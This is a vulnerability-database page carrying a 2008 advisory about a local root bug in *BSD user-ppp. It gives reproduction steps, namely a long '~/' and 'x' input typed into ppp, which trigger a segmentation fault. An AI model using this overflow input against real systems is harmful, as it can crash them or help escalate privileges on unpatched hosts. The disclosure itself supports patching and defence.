Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19332
HistoryMar 04, 2008 - 12:00 a.m.

*BSD user-ppp local root (when conditions permit)

2008-03-0400:00:00
vulners.com
15
JSON

/***********************************************************************************/

/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher***/

/*** 2003 / 12 /23 - PRIVATE CODE ***/

/*** Program terminated with signal 11, Segmentation fault. ***/

/*** #0 0xbeefdead in ?? () ***/

/***********************************************************************************/

I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on
OpenBSD (unconfirmed on 4.2)

Steps to reproduce:

  1. Run ppp

  2. type the following (or atleat some variation of)

~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

This will produce a segmentation violation (Core dumped).

Discovered by: sipher

Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet

JSON